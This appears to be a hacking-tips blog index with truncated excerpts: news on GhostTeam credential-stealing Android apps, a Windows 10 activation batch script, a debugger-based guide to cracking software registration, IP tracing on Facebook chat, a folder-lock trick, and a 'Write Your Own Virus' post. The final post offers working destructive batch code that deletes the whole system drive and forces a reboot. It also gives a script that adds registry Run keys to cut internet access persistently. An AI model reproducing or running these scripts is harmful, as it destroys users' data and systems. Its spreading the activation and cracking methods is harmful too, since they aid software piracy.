Posts

Facebook Password Stealing Apps Found on Android Play Store

Image
Facebook Password Stealing Apps Found on Android Play Store...              Even after many efforts made by Google last year, malicious apps always somehow manage to make their ways into Google app store. Security researchers have now discovered a new piece of malware, dubbed GhostTeam, in at least 56 applications on Google Play Store that is designed to steal Facebook login credentials and aggressively display pop-up advertisements to users. Discovered independently by two cybersecurity firms,  Trend Micro  and  Avast  the malicious apps disguise as various utility (such as the flashlight, QR code scanner, and compass), performance-boosting (like file-transfer and cleaner), entertainment, lifestyle and video downloader apps. Like most malware apps, these Android apps themselves don’t contain any malicious code, which is why they managed to end up on Google's official Play Store.                       Once installed, it first confirms if the device is not an emulator or a v

Easy Way to Activate Windows 10 !!!

Easy Way to Activate the Windows 10(Any Edition) Step 1:            Copy these codes and paste it in Notepad @echo off title Windows 10 ALL version activator&cls&echo ************************************&echo Supported products:&echo - Windows 10 Home&echo - Windows 10 Professional&echo - Windows 10 Enterprise, Enterprise LTSB&echo - Windows 10 Education&echo.&echo.&echo ************************************ &echo Windows 10 activation... cscript //nologo c:\windows\system32\slmgr.vbs /ipk TX9XD-98N7V-6WMQ6-BX7FG-H8Q99 >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk 3KHY7-WNT83-DGQKR-F7HPR-844BM >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk PVMJN-6DFY6-9CCP6-7BKTT-D3WVR >nul cscript //nologo c:\windows\system32\slmgr.vbs /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX >nul cscript //nologo c:\windows\system32\slmgr.vbs /ip

How To Bypass Software Registration 2017 in Simple steps:

Image
If you’ve ever wonder how software pirates can take software and crack it time and time again, even with security in place, this small series is for you on how to bypass software registration 2017. Even with today’s most advanced methods of defeating piracy in place, it is still relatively easy to crack almost any program in the world. This is mainly due to computer processes’ ability to be completely manipulated by an assembly debugger. Using this, you can completely crack software license process by making it skip the application’s key code verification process without using a valid key. This works because assembly allows you to speak directly to the processor and force a skip over the registration process and helps you in crack any software license key to use it for life time. Bypass software registration requirements: Windows (for examples only, debuggers exist across platforms) A debugger installed: IDA ,  ollydbg , etc. (ollydbg will be used in examples) Let me take y

Secure Your Computer By Blocking Dangerous IP Automatically!!!

Image
Normally, spying and other critical bots are always online to find out the vulnerability in your computer, there are million of IP’s on the internet that pretends to be safe but in the actual term, they are very dangerous which may steal your valuable files and credentials from your computer After buying a computer, securing it from online is the first part, we secure that by using external Anti-Virus or in-build OS anti-virus but all we know that they really don’t have such techniques to block or detect any dangerous or suspicious IP’s. There are many spy agency across the internet that tries to keep track on users (so be aware of it). Some software that works same as your windows firewall but additionally they can detect and block dangerous IP address whichever looks like data theft programs or spyware link. The below methods will extend computer high security. Bot Revolt: This application in your windows computer monitors the connection and the web address to block any spywar

How To Trace&Track Location Of Chat on Facebook!

Image
     Today you chats on social networks to lots of people that we know or sometime don’t. But it is important to make sure that the anonymous person you talking can be a fake one. So you can checkout the location of that person you talking to check that is that person is actually at the place where he/she is telling. so our trick will be helpful to track the location of any person on the web. You just have to follow the below post to proceed.      There are some different methods that you can use according to your convenience as complex is the method, better will be the result. So read out all the method discussed below and use any of them to checkout the location of any person by chatting on social sites.  #1 Method: Tracing IP Address Of Person On Facebook Chat Using Command Prompt Using command prompt you can actually trace out the ip address of a person you chatting on facebook. Just follow the steps below to proceed. First of all start chatting with your frie

Lock Folder Without Any Software with Password 2017 [100% Real]

Image
You can easily lock any folder on your Windows computer with a simple Notepad hack. By creating a batch file, you can hide a folder and require a password be entered before it becomes visible and accessible. This is a great tool for locking sensitive information, like pictures, financial statements, and a lot more. This trick will work on just about any version of the operating system, including Windows 10, Windows 7, Windows XP, Windows 98, and so on. Step 1 Start by opening Notepad, either from search, the Start Menu, or simply right-click inside a folder, then choose New -> Text Document Step 2 Add Code to Document Now just copy the text below and paste it into your document. @ECHO OFF if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Private goto MDPrivate :CONFIRM echo Are you sure to lock this folder? (Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if

Write Your Own Virus For Windows!!!

Image
WARNING:  I am not responsible for any damage or error reporting in Your pc do it on your own risk. This coding is only for knowledge purpose.A guide to writing your own computer virus. All Scripts Here Are To Be Copied In NotePad. >>This Virus Deletes All The Content Of A Drive… @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Save The Above Code in a .bat file >>Disable Internet Permanently Save As A bat File echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE >>The Most Simple Virus To Crush The Window @Echo off De